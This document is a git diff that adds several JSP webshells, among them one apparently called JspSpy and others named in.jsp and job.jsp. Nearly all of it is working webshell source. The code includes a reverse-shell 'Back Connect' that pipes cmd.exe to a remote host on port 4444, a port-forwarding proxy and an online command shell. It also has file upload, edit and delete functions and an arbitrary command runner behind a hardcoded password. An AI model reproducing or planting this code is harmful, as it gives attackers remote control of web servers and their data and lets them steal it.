Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) +return; +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +final ServerSocket server = new ServerSocket(); +server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); +JSession.setAttribute(PORT_MAP,server); +new Thread(new Runnable(){ +public void run(){ +while (true) { +Socket soc = null; +Socket remoteSoc = null; +DataInputStream remoteIn = null; +DataOutputStream remoteOut = null; +DataInputStream localIn = null; +DataOutputStream localOut = null; +try{ +soc = server.accept(); +remoteSoc = new Socket(); +remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); +remoteIn = new DataInputStream(remoteSoc.getInputStream()); +remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); +localIn = new DataInputStream(soc.getInputStream()); +localOut = new DataOutputStream(soc.getOutputStream()); +this.readFromLocal(localIn,remoteOut); +this.readFromRemote(soc,remoteSoc,remoteIn,localOut); +}catch(Exception ex) +{ +break; +} +} +} +public void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ +new Thread(new Runnable(){ +public void run(){ +while (true) { +try{ +byte[] data = new byte[100]; +int len = localIn.read(data); +while (len != -1) { +remoteOut.write(data,0,len); +len = localIn.read(data); +} +}catch (Exception e) { +break; +} +} +} +}).start(); +} +public void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ +new Thread(new Runnable(){ +public void run(){ +while(true) { +try{ +byte[] data = new byte[100]; +int len = remoteIn.read(data); +while (len != -1) { +localOut.write(data,0,len); +len = remoteIn.read(data); +} +}catch (Exception e) { +try{ +soc.close(); +remoteSoc.close(); +}catch(Exception ex) { +} +break; +} +} +} +}).start(); +} +}).start(); +JSession.setAttribute("done","Map Port Success!"); +JSession.setAttribute("localIP",localIP); +JSession.setAttribute("localPort",localPort); +JSession.setAttribute("remoteIP",remoteIP); +JSession.setAttribute("remotePort",remotePort); +response.sendRedirect(SHELL_NAME+"?o=vmp"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VBackConnect +private static class VbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object ip = JSession.getAttribute("ip"); +Object port = JSession.getAttribute("port"); +Object program = JSession.getAttribute("program"); +Object done = JSession.getAttribute("done"); +JSession.removeAttribute("ip"); +JSession.removeAttribute("port"); +JSession.removeAttribute("program"); +JSession.removeAttribute("done"); +if (Util.isEmpty(ip)) +ip = request.getRemoteAddr(); +if (Util.isEmpty(port) || !Util.isInteger(port.toString())) +port = "4444"; +if (Util.isEmpty(program)) +program = "cmd.exe"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    Back Connect >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Your Ip :"+ +" "+ +" Your Port :"+ +" Program To Back :"+ +"

    "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BackConnectInvoker extends DefaultInvoker { +public boolean doAfter(){return false;} +public boolean doBefore(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String ip = request.getParameter("ip"); +String port = request.getParameter("port"); +String program = request.getParameter("program"); +if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) +return; +Socket socket = new Socket(ip,Integer.parseInt(port)); +Process process = Runtime.getRuntime().exec(program); +(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); +(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); +JSession.setAttribute("done","Back Connect Success!"); +JSession.setAttribute("ip",ip); +JSession.setAttribute("port",port); +JSession.setAttribute("program",program); +response.sendRedirect(SHELL_NAME+"?o=vbc"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class JspEnvInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"

    System Properties >>

    "+ +"
    "+ +"
    "+ +"
      "); +Properties pro = System.getProperties(); +Enumeration names = pro.propertyNames(); +while (names.hasMoreElements()){ +String name = (String)names.nextElement(); +out.println("
    • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
      • "); +} +out.println("

    System Environment >>

      "); +Map envs = System.getenv(); +Set> entrySet = envs.entrySet(); +for (Map.Entry en:entrySet) { +out.println("
    • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
      • "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class TopInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    JspSpy Ver: 2009"+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+")
    Logout | "+ +" File Manager | "+ +" DataBase Manager | "+ +" Execute Command | "+ +" Shell OnLine | "+ +" Back Connect | "+ +" Port Scan | "+ +" Download Remote File | "+ +" ClipBoard | "+ +" Remote Control | "+ +" Port Map | "+ +" JSP Env "+ +"
    "); +if (JSession.getAttribute(MSG) != null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VOnLineShellInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "); +out.println("

    Shell OnLine »


    "); +out.println("
    "+ +" "+ +" "+ +" Notice ! If You Are Using IE , You Must Input A Command First After You Start Or You Will Not See The Echo"+ +"
    "+ +"
    "+ +" "+ +"
    "+ +" "+ +" "+ +" "+ +" Auto Scroll"+ +" "+ +"
    "+ +" " +); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class OnLineInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String type = request.getParameter("type"); +if (Util.isEmpty(type)) +return; +if (type.toLowerCase().equals("start")) { +String exe = request.getParameter("exe"); +if (Util.isEmpty(exe)) +return; +Process pro = Runtime.getRuntime().exec(exe); +ByteArrayOutputStream outs = new ByteArrayOutputStream(); +response.setContentLength(100000000); +response.setContentType("text/html;charset="+Charset.defaultCharset().name()); +OnLineProcess olp = new OnLineProcess(pro); +JSession.setAttribute(SHELL_ONLINE,olp); +new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); +new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); +new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//错误信息流。 +Thread.sleep(1000 * 60 * 60 * 24); +} else if (type.equals("ecmd")) { +Object o = JSession.getAttribute(SHELL_ONLINE); +String cmd = request.getParameter("cmd"); +if (Util.isEmpty(cmd)) +return; +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.setCmd(cmd); +} else { +Object o = JSession.getAttribute(SHELL_ONLINE); +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.stop(); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} + +static{ +ins.put("script",new ScriptInvoker()); +ins.put("before",new BeforeInvoker()); +ins.put("after",new AfterInvoker()); +ins.put("deleteBatch",new DeleteBatchInvoker()); +ins.put("clipboard",new ClipBoardInvoker()); +ins.put("vRemoteControl",new VRemoteControlInvoker()); +ins.put("gc",new GcInvoker()); +ins.put("vPortScan",new VPortScanInvoker()); +ins.put("portScan",new PortScanInvoker()); +ins.put("vConn",new VConnInvoker()); +ins.put("dbc",new DbcInvoker()); +ins.put("executesql",new ExecuteSQLInvoker()); +ins.put("vLogin",new VLoginInvoker()); +ins.put("login",new LoginInvoker()); +ins.put("filelist", new FileListInvoker()); +ins.put("logout",new LogoutInvoker()); +ins.put("upload",new UploadInvoker()); +ins.put("copy",new CopyInvoker()); +ins.put("bottom",new BottomInvoker()); +ins.put("vCreateFile",new VCreateFileInvoker()); +ins.put("vEdit",new VEditInvoker()); +ins.put("createFile",new CreateFileInvoker()); +ins.put("vEditProperty",new VEditPropertyInvoker()); +ins.put("editProperty",new EditPropertyInvoker()); +ins.put("vs",new VsInvoker()); +ins.put("shell",new ShellInvoker()); +ins.put("down",new DownInvoker()); +ins.put("vd",new VdInvoker()); +ins.put("downRemote",new DownRemoteInvoker()); +ins.put("index",new IndexInvoker()); +ins.put("mkdir",new MkDirInvoker()); +ins.put("move",new MoveInvoker()); +ins.put("removedir",new RemoteDirInvoker()); +ins.put("packBatch",new PackBatchInvoker()); +ins.put("pack",new PackInvoker()); +ins.put("unpack",new UnPackInvoker()); +ins.put("vmp",new VmpInvoker()); +ins.put("vbc",new VbcInvoker()); +ins.put("backConnect",new BackConnectInvoker()); +ins.put("jspEnv",new JspEnvInvoker()); +ins.put("smp",new SmpInvoker()); +ins.put("mapPort",new MapPortInvoker()); +ins.put("top",new TopInvoker()); +ins.put("vso",new VOnLineShellInvoker()); +ins.put("online",new OnLineInvoker()); +} +%> +<% +try { +String o = request.getParameter("o"); +if (!Util.isEmpty(o)) { +Invoker in = ins.get(o); +if (in == null) { +response.sendRedirect(SHELL_NAME+"?o=index"); +} else { +if (in.doBefore()) { +String path = request.getParameter("folder"); +if (!Util.isEmpty(path)) +session.setAttribute(CURRENT_DIR,path); +ins.get("before").invoke(request,response,session); +ins.get("script").invoke(request,response,session); +ins.get("top").invoke(request,response,session); +} +in.invoke(request,response,session); +if (!in.doAfter()) { +return; +}else{ +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +} +} else { +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +ByteArrayOutputStream bout = new ByteArrayOutputStream(); +e.printStackTrace(new PrintStream(bout)); +session.setAttribute(CURRENT_DIR,SHELL_DIR); +Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","
    "),"left"); +bout.close(); +out.flush(); +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +%> \ No newline at end of file diff --git a/jsp/hackk8/fuck-jsp/in.jsp b/jsp/hackk8/fuck-jsp/in.jsp new file mode 100644 index 0000000..fc44a95 --- /dev/null +++ b/jsp/hackk8/fuck-jsp/in.jsp @@ -0,0 +1,982 @@ +<% +/** +xxxxxxxxxxxx xxxxxxxxxxxxxxxx +@xxxxxxxxx JFolder.jsp +@Description x +@Author Steven Cee +@Email xxxx@Gmail.com +@Bugs : ʱļ޷ʾ +*/ +%> +<%@ page contentType="text/html;charset=gb2312"%> +<%@page import="java.io.*,java.util.*,java.net.*" %> +<%! +private final static int languageNo=0; //԰汾0 : ģ 1Ӣ +String strThisFile="JFolder.jsp"; +String[] authorInfo={" "," "}; +String[] strFileManage = {" ","File Management"}; +String[] strCommand = {"CMD ","Command Window"}; +String[] strSysProperty = {"","System Property"}; +String[] strHelp = {"","Help"}; +String[] strParentFolder = {"ϼĿ¼","Parent Folder"}; +String[] strCurrentFolder= {"ǰĿ¼","Current Folder"}; +String[] strDrivers = {"","Drivers"}; +String[] strFileName = {"ļ","File Name"}; +String[] strFileSize = {"ļС","File Size"}; +String[] strLastModified = {"޸","Last Modified"}; +String[] strFileOperation= {"ļ","Operations"}; +String[] strFileEdit = {"޸","Edit"}; +String[] strFileDown = {"","Download"}; +String[] strFileCopy = {"","Move"}; +String[] strFileDel = {"ɾ","Delete"}; +String[] strExecute = {"ִ","Execute"}; +String[] strBack = {"","Back"}; +String[] strFileSave = {"","Save"}; + +public class FileHandler +{ + private String strAction=""; + private String strFile=""; + void FileHandler(String action,String f) + { + + } +} + +public static class UploadMonitor { + + static Hashtable uploadTable = new Hashtable(); + + static void set(String fName, UplInfo info) { + uploadTable.put(fName, info); + } + + static void remove(String fName) { + uploadTable.remove(fName); + } + + static UplInfo getInfo(String fName) { + UplInfo info = (UplInfo) uploadTable.get(fName); + return info; + } +} + +public class UplInfo { + + public long totalSize; + public long currSize; + public long starttime; + public boolean aborted; + + public UplInfo() { + totalSize = 0l; + currSize = 0l; + starttime = System.currentTimeMillis(); + aborted = false; + } + + public UplInfo(int size) { + totalSize = size; + currSize = 0; + starttime = System.currentTimeMillis(); + aborted = false; + } + + public String getUprate() { + long time = System.currentTimeMillis() - starttime; + if (time != 0) { + long uprate = currSize * 1000 / time; + return convertFileSize(uprate) + "/s"; + } + else return "n/a"; + } + + public int getPercent() { + if (totalSize == 0) return 0; + else return (int) (currSize * 100 / totalSize); + } + + public String getTimeElapsed() { + long time = (System.currentTimeMillis() - starttime) / 1000l; + if (time - 60l >= 0){ + if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; + else return time / 60 + ":0" + (time % 60) + "m"; + } + else return time<10 ? "0" + time + "s": time + "s"; + } + + public String getTimeEstimated() { + if (currSize == 0) return "n/a"; + long time = System.currentTimeMillis() - starttime; + time = totalSize * time / currSize; + time /= 1000l; + if (time - 60l >= 0){ + if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; + else return time / 60 + ":0" + (time % 60) + "m"; + } + else return time<10 ? "0" + time + "s": time + "s"; + } + + } + + public class FileInfo { + + public String name = null, clientFileName = null, fileContentType = null; + private byte[] fileContents = null; + public File file = null; + public StringBuffer sb = new StringBuffer(100); + + public void setFileContents(byte[] aByteArray) { + fileContents = new byte[aByteArray.length]; + System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length); + } +} + +// A Class with methods used to process a ServletInputStream +public class HttpMultiPartParser { + + private final String lineSeparator = System.getProperty("line.separator", "\n"); + private final int ONE_MB = 1024 * 1; + + public Hashtable processData(ServletInputStream is, String boundary, String saveInDir, + int clength) throws IllegalArgumentException, IOException { + if (is == null) throw new IllegalArgumentException("InputStream"); + if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException( + "\"" + boundary + "\" is an illegal boundary indicator"); + boundary = "--" + boundary; + StringTokenizer stLine = null, stFields = null; + FileInfo fileInfo = null; + Hashtable dataTable = new Hashtable(5); + String line = null, field = null, paramName = null; + boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0); + boolean isFile = false; + if (saveFiles) { // Create the required directory (including parent dirs) + File f = new File(saveInDir); + f.mkdirs(); + } + line = getLine(is); + if (line == null || !line.startsWith(boundary)) throw new IOException( + "Boundary not found; boundary = " + boundary + ", line = " + line); + while (line != null) { + if (line == null || !line.startsWith(boundary)) return dataTable; + line = getLine(is); + if (line == null) return dataTable; + stLine = new StringTokenizer(line, ";\r\n"); + if (stLine.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in second line"); + line = stLine.nextToken().toLowerCase(); + if (line.indexOf("form-data") < 0) throw new IllegalArgumentException( + "Bad data in second line"); + stFields = new StringTokenizer(stLine.nextToken(), "=\""); + if (stFields.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in second line"); + fileInfo = new FileInfo(); + stFields.nextToken(); + paramName = stFields.nextToken(); + isFile = false; + if (stLine.hasMoreTokens()) { + field = stLine.nextToken(); + stFields = new StringTokenizer(field, "=\""); + if (stFields.countTokens() > 1) { + if (stFields.nextToken().trim().equalsIgnoreCase("filename")) { + fileInfo.name = paramName; + String value = stFields.nextToken(); + if (value != null && value.trim().length() > 0) { + fileInfo.clientFileName = value; + isFile = true; + } + else { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + } + else if (field.toLowerCase().indexOf("filename") >= 0) { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + boolean skipBlankLine = true; + if (isFile) { + line = getLine(is); + if (line == null) return dataTable; + if (line.trim().length() < 1) skipBlankLine = false; + else { + stLine = new StringTokenizer(line, ": "); + if (stLine.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in third line"); + stLine.nextToken(); // Content-Type + fileInfo.fileContentType = stLine.nextToken(); + } + } + if (skipBlankLine) { + line = getLine(is); + if (line == null) return dataTable; + } + if (!isFile) { + line = getLine(is); + if (line == null) return dataTable; + dataTable.put(paramName, line); + // If parameter is dir, change saveInDir to dir + if (paramName.equals("dir")) saveInDir = line; + line = getLine(is); + continue; + } + try { + UplInfo uplInfo = new UplInfo(clength); + UploadMonitor.set(fileInfo.clientFileName, uplInfo); + OutputStream os = null; + String path = null; + if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir, + fileInfo.clientFileName)); + else os = new ByteArrayOutputStream(ONE_MB); + boolean readingContent = true; + byte previousLine[] = new byte[2 * ONE_MB]; + byte temp[] = null; + byte currentLine[] = new byte[2 * ONE_MB]; + int read, read3; + if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) { + line = null; + break; + } + while (readingContent) { + if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) { + line = null; + uplInfo.aborted = true; + break; + } + if (compareBoundary(boundary, currentLine)) { + os.write(previousLine, 0, read - 2); + line = new String(currentLine, 0, read3); + break; + } + else { + os.write(previousLine, 0, read); + uplInfo.currSize += read; + temp = currentLine; + currentLine = previousLine; + previousLine = temp; + read = read3; + }//end else + }//end while + os.flush(); + os.close(); + if (!saveFiles) { + ByteArrayOutputStream baos = (ByteArrayOutputStream) os; + fileInfo.setFileContents(baos.toByteArray()); + } + else fileInfo.file = new File(path); + dataTable.put(paramName, fileInfo); + uplInfo.currSize = uplInfo.totalSize; + }//end try + catch (IOException e) { + throw e; + } + } + return dataTable; + } + + /** + * Compares boundary string to byte array + */ + private boolean compareBoundary(String boundary, byte ba[]) { + byte b; + if (boundary == null || ba == null) return false; + for (int i = 0; i < boundary.length(); i++) + if ((byte) boundary.charAt(i) != ba[i]) return false; + return true; + } + + /** Convenience method to read HTTP header lines */ + private synchronized String getLine(ServletInputStream sis) throws IOException { + byte b[] = new byte[1024]; + int read = sis.readLine(b, 0, b.length), index; + String line = null; + if (read != -1) { + line = new String(b, 0, read); + if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1); + } + return line; + } + + public String getFileName(String dir, String fileName) throws IllegalArgumentException { + String path = null; + if (dir == null || fileName == null) throw new IllegalArgumentException( + "dir or fileName is null"); + int index = fileName.lastIndexOf('/'); + String name = null; + if (index >= 0) name = fileName.substring(index + 1); + else name = fileName; + index = name.lastIndexOf('\\'); + if (index >= 0) fileName = name.substring(index + 1); + path = dir + File.separator + fileName; + if (File.separatorChar == '/') return path.replace('\\', File.separatorChar); + else return path.replace('/', File.separatorChar); + } +} //End of class HttpMultiPartParser + +String formatPath(String p) +{ + StringBuffer sb=new StringBuffer(); + for (int i = 0; i < p.length(); i++) + { + if(p.charAt(i)=='\\') + { + sb.append("\\\\"); + } + else + { + sb.append(p.charAt(i)); + } + } + return sb.toString(); +} + + /** + * Converts some important chars (int) to the corresponding html string + */ + static String conv2Html(int i) { + if (i == '&') return "&"; + else if (i == '<') return "<"; + else if (i == '>') return ">"; + else if (i == '"') return """; + else return "" + (char) i; + } + + /** + * Converts a normal string to a html conform string + */ + static String htmlEncode(String st) { + StringBuffer buf = new StringBuffer(); + for (int i = 0; i < st.length(); i++) { + buf.append(conv2Html(st.charAt(i))); + } + return buf.toString(); + } +String getDrivers() +/** +Windowsϵͳȡÿõ߼ +*/ +{ + StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : "); + File roots[]=File.listRoots(); + for(int i=0;i"); + sb.append(roots[i]+" "); + } + return sb.toString(); +} +static String convertFileSize(long filesize) +{ + //bug 5.09M ʾ5.9M + String strUnit="Bytes"; + String strAfterComma=""; + int intDivisor=1; + if(filesize>=1024*1024) + { + strUnit = "MB"; + intDivisor=1024*1024; + } + else if(filesize>=1024) + { + strUnit = "KB"; + intDivisor=1024; + } + if(intDivisor==1) return filesize + " " + strUnit; + strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ; + if(strAfterComma=="") strAfterComma=".0"; + return filesize / intDivisor + "." + strAfterComma + " " + strUnit; +} +%> +<% +request.setCharacterEncoding("gb2312"); +String tabID = request.getParameter("tabID"); +String strDir = request.getParameter("path"); +String strAction = request.getParameter("action"); +String strFile = request.getParameter("file"); +String strPath = strDir + "\\" + strFile; +String strCmd = request.getParameter("cmd"); +StringBuffer sbEdit=new StringBuffer(""); +StringBuffer sbDown=new StringBuffer(""); +StringBuffer sbCopy=new StringBuffer(""); +StringBuffer sbSaveCopy=new StringBuffer(""); +StringBuffer sbNewFile=new StringBuffer(""); + +if((tabID==null) || tabID.equals("")) +{ + tabID = "1"; +} + +if(strDir==null||strDir.length()<1) +{ + strDir = request.getRealPath("/"); +} + + +if(strAction!=null && strAction.equals("down")) +{ + File f=new File(strPath); + if(f.length()==0) + { + sbDown.append("ļСΪ 0 ֽڣͲ˰"); + } + else + { + response.setHeader("content-type","text/html; charset=ISO-8859-1"); + response.setContentType("APPLICATION/OCTET-STREAM"); + response.setHeader("Content-Disposition","attachment; filename=\""+f.getName()+"\""); + FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath()); + out.clearBuffer(); + int i; + while ((i=fileInputStream.read()) != -1) + { + out.write(i); + } + fileInputStream.close(); + out.close(); + } +} + +if(strAction!=null && strAction.equals("del")) +{ + File f=new File(strPath); + f.delete(); +} + +if(strAction!=null && strAction.equals("edit")) +{ + File f=new File(strPath); + BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f))); + sbEdit.append("
    \r\n"); + sbEdit.append("\r\n"); + sbEdit.append("\r\n"); + sbEdit.append("\r\n"); + sbEdit.append(" "); + sbEdit.append("  "+strPath+"\r\n"); + sbEdit.append("
    "); + sbEdit.append(""); + sbEdit.append("
    "); +} + +if(strAction!=null && strAction.equals("save")) +{ + File f=new File(strPath); + BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f))); + String strContent=request.getParameter("content"); + bw.write(strContent); + bw.close(); +} +if(strAction!=null && strAction.equals("copy")) +{ + File f=new File(strPath); + sbCopy.append("
    \r\n"); + sbCopy.append("\r\n"); + sbCopy.append("\r\n"); + sbCopy.append("\r\n"); + sbCopy.append("ԭʼļ "+strPath+"

    "); + sbCopy.append("Ŀļ

    "); + sbCopy.append(" "); + sbCopy.append("

     \r\n"); + sbCopy.append("

    "); +} +if(strAction!=null && strAction.equals("savecopy")) +{ + File f=new File(strPath); + String strDesFile=request.getParameter("file2"); + if(strDesFile==null || strDesFile.equals("")) + { + sbSaveCopy.append("

    Ŀļ"); + } + else + { + File f_des=new File(strDesFile); + if(f_des.isFile()) + { + sbSaveCopy.append("

    ĿļѴ,ܸơ"); + } + else + { + String strTmpFile=strDesFile; + if(f_des.isDirectory()) + { + if(!strDesFile.endsWith("\\")) + { + strDesFile=strDesFile+"\\"; + } + strTmpFile=strDesFile+"cqq_"+strFile; + } + + File f_des_copy=new File(strTmpFile); + FileInputStream in1=new FileInputStream(f); + FileOutputStream out1=new FileOutputStream(f_des_copy); + byte[] buffer=new byte[1024]; + int c; + while((c=in1.read(buffer))!=-1) + { + out1.write(buffer,0,c); + } + in1.close(); + out1.close(); + + sbSaveCopy.append("ԭʼļ "+strPath+"

    "); + sbSaveCopy.append("Ŀļ "+strTmpFile+"

    "); + sbSaveCopy.append("Ƴɹ"); + } + } + sbSaveCopy.append("

    "); +} +if(strAction!=null && strAction.equals("newFile")) +{ + String strF=request.getParameter("fileName"); + String strType1=request.getParameter("btnNewFile"); + String strType2=request.getParameter("btnNewDir"); + String strType=""; + if(strType1==null) + { + strType="Dir"; + } + else if(strType2==null) + { + strType="File"; + } + if(!strType.equals("") && !(strF==null || strF.equals(""))) + { + File f_new=new File(strF); + if(strType.equals("File") && !f_new.createNewFile()) + sbNewFile.append(strF+" ļʧ"); + if(strType.equals("Dir") && !f_new.mkdirs()) + sbNewFile.append(strF+" Ŀ¼ʧ"); + } + else + { + sbNewFile.append("

    ļĿ¼"); + } +} + +if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart"))) +{ + String tempdir="."; + boolean error=false; + response.setContentType("text/html"); + sbNewFile.append("

    ļĿ¼"); + HttpMultiPartParser parser = new HttpMultiPartParser(); + + int bstart = request.getContentType().lastIndexOf("oundary="); + String bound = request.getContentType().substring(bstart + 8); + int clength = request.getContentLength(); + Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength); + if (ht.get("cqqUploadFile") != null) + { + + FileInfo fi = (FileInfo) ht.get("cqqUploadFile"); + File f1 = fi.file; + UplInfo info = UploadMonitor.getInfo(fi.clientFileName); + if (info != null && info.aborted) + { + f1.delete(); + request.setAttribute("error", "Upload aborted"); + } + else + { + String path = (String) ht.get("path"); + if(path!=null && !path.endsWith("\\")) + path = path + "\\"; + if (!f1.renameTo(new File(path + f1.getName()))) + { + request.setAttribute("error", "Cannot upload file."); + error = true; + f1.delete(); + } + } + } +} +%> + + + + + + + +index + + + + + +

    + + + + + + +
    + + + + + + +<% +StringBuffer sbFolder=new StringBuffer(""); +StringBuffer sbFile=new StringBuffer(""); +try +{ + File objFile = new File(strDir); + File list[] = objFile.listFiles(); + if(objFile.getAbsolutePath().length()>3) + { + sbFolder.append(" "); + sbFolder.append(strParentFolder[languageNo]+"
    - - - - - - - - - - - \r\n "); + + + } + for(int i=0;i "); + sbFolder.append(" "); + sbFolder.append(list[i].getName()+"
    "); + } + else + { + String strLen=""; + String strDT=""; + long lFile=0; + lFile=list[i].length(); + strLen = convertFileSize(lFile); + Date dt=new Date(list[i].lastModified()); + strDT=dt.toLocaleString(); + sbFile.append(""); + sbFile.append(""+list[i].getName()); + sbFile.append(""); + sbFile.append(""+strLen); + sbFile.append(""); + sbFile.append(""+strDT); + sbFile.append(""); + + sbFile.append("  "); + sbFile.append(strFileEdit[languageNo]+" "); + + sbFile.append("  "); + sbFile.append(strFileDel[languageNo]+" "); + + sbFile.append("  "); + sbFile.append(strFileDown[languageNo]+" "); + + sbFile.append("  "); + sbFile.append(strFileCopy[languageNo]+" "); + } + + } +} +catch(Exception e) +{ + out.println("ʧܣ "+e.toString()+""); +} +%> + +
    + + + + + + + + + +
    +

    +
    + diff --git a/jsp/hackk8/fuck-jsp/job.jsp b/jsp/hackk8/fuck-jsp/job.jsp new file mode 100644 index 0000000..9cad130 --- /dev/null +++ b/jsp/hackk8/fuck-jsp/job.jsp @@ -0,0 +1,1811 @@ +<%@ page contentType="text/html; charset=GBK" %> +<%@ page import="java.io.*"%> +<%@ page import="java.util.Map"%> +<%@ page import="java.util.HashMap"%> +<%@ page import="java.nio.charset.Charset"%> +<%@ page import="java.util.regex.*"%> +<%@ page import="java.sql.*"%> +<%! +private String _password = "520520"; +private String _encodeType = "GB2312"; +private int _sessionOutTime = 20; +private String[] _textFileTypes = {"txt", "htm", "html", "asp", "jsp", "java", "js", "css", "c", "cpp", "sh", "pl", "cgi", "php", "conf", "xml", "xsl", "ini", "vbs", "inc"}; +private Connection _dbConnection = null; +private Statement _dbStatement = null; +private String _url = null; + +public boolean validate(String password) { + if (password.equals(_password)) { + return true; + } else { + return false; + } +} + +public String HTMLEncode(String str) { + str = str.replaceAll(" ", " "); + str = str.replaceAll("<", "<"); + str = str.replaceAll(">", ">"); + str = str.replaceAll("\r\n", "
    "); + + return str; +} + +public String Unicode2GB(String str) { + String sRet = null; + + try { + sRet = new String(str.getBytes("ISO8859_1"), _encodeType); + } catch (Exception e) { + sRet = str; + } + + return sRet; +} + +public String exeCmd(String cmd) { + Runtime runtime = Runtime.getRuntime(); + Process proc = null; + String retStr = ""; + InputStreamReader insReader = null; + char[] tmpBuffer = new char[1024]; + int nRet = 0; + + try { + proc = runtime.exec(cmd); + insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312")); + + while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) { + retStr += new String(tmpBuffer, 0, nRet); + } + + insReader.close(); + retStr = HTMLEncode(retStr); + } catch (Exception e) { + retStr = "bad command \"" + cmd + "\""; + } finally { + return retStr; + } +} + +public String pathConvert(String path) { + String sRet = path.replace('\\', '/'); + File file = new File(path); + + if (file.getParent() != null) { + if (file.isDirectory()) { + if (! sRet.endsWith("/")) + sRet += "/"; + } + } else { + if (! sRet.endsWith("/")) + sRet += "/"; + } + + return sRet; +} + +public String strCut(String str, int len) { + String sRet; + + len -= 3; + + if (str.getBytes().length <= len) { + sRet = str; + } else { + try { + sRet = (new String(str.getBytes(), 0, len, "GBK")) + "..."; + } catch (Exception e) { + sRet = str; + } + } + + return sRet; +} + +public String listFiles(String path, String curUri) { + File[] files = null; + File curFile = null; + String sRet = null; + int n = 0; + boolean isRoot = path.equals(""); + + path = pathConvert(path); + + try { + if (isRoot) { + files = File.listRoots(); + } else { + try { + curFile = new File(path); + String[] sFiles = curFile.list(); + files = new File[sFiles.length]; + + for (n = 0; n < sFiles.length; n ++) { + files[n] = new File(path + sFiles[n]); + } + } catch (Exception e) { + sRet = "bad path \"" + path + "\""; + } + } + + if (sRet == null) { 